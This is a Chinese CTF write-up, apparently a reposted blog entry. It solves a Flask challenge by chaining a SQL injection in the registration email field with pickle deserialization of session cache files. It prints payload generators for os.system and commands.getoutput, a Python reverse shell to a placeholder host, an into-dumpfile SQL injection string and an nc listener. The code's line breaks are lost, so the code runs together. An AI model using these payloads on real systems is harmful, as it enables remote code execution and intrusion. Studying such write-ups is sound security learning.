本文共 2006 字,大约阅读时间需要 6 分钟。
参考文献:
源码下载下来后,是基于flask框架,先查看路由文件routes.py,里面功能大部分是基于登陆的。
在others.py的最后有这样的内容
load()函数
有一个unpkler函数
用于反序列化参数(file),如果file可控那么这就是一个反序列化漏洞。
借用下大佬的payload,理解下这个。
用下面的脚本(12.py)进行序列化payload的生成:
import osfrom pickle import Pickler as Pklerimport commandsclass hhh(object): def __reduce__(self): return (os.system,("whoami",))evil = hhh()def dump(file): pkler = Pkler(file) pkler.dump(evil)with open("test","wb") as f: dump(f)
测试反序列化漏洞(13.py):
from pickle import Unpickler as Unpklerfrom io import open as Opendef LOAD(file): unpkler = Unpkler(file) return Unpkler(file).load()with Open("test","rb") as f: LOAD(f)
执行会12.py后,会在12.py的同级目录下生成test,执行13.py会显示出用户信息
全局搜索load()函数
,发现它在Mycache.py的FileSystemCache类中有多次引用。(代码太长了,贴下有用的)
其中self.key_prefix为bdwsessions
,因此假设cookie中的sesssion值为pleated,则self.key_prefix + sid即为bdwsessionspleated,然后这串字符串进行MD5得到的结果0ab5423aafb316e9c299e0bb853d0c11
。这样就可以控制file了。
攻击流程
①本地生成序列化文件,并且进行十六进制编码 ②通过第一关的sql注入,将本地生成的payload,写入服务器上的session文件,指定文件名为MD5(bdwsessionspleated),这样我们在访问/index的时候把cookie中的session值改为pleated,触发open_session中的self.cache.get就可以进行反序列化攻击了沙箱逃逸
源码还设置了沙箱/黑名单来防止某些函数的执行,比如前面的os.system就被禁用了commands.getoutput和subprocess.Popen()
并没有过滤,payload用的是 commands.getoutput
import cPickleimport commandsclass Exp(object): def __reduce__(self): return (commands.getoutput,("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",)) e = Exp()poc = cPickle.dumps(e)print '0x'+poc.encode('hex')
在注册的邮箱处填入:
test12'/**/union/**/select/**/0x63636f....../**/into/**/dumpfile/**/'/tmp/ffff/0ab5423aafb316e9c299e0bb853d0c11'#@test12.com
注册后出现Please use a different email address.。说明写入成功
然后访问 抓包修改session值为pleated反弹shell
nc -l -p 8181 -vvv
查看flag即可。
转载地址:http://kmkwo.baihongyu.com/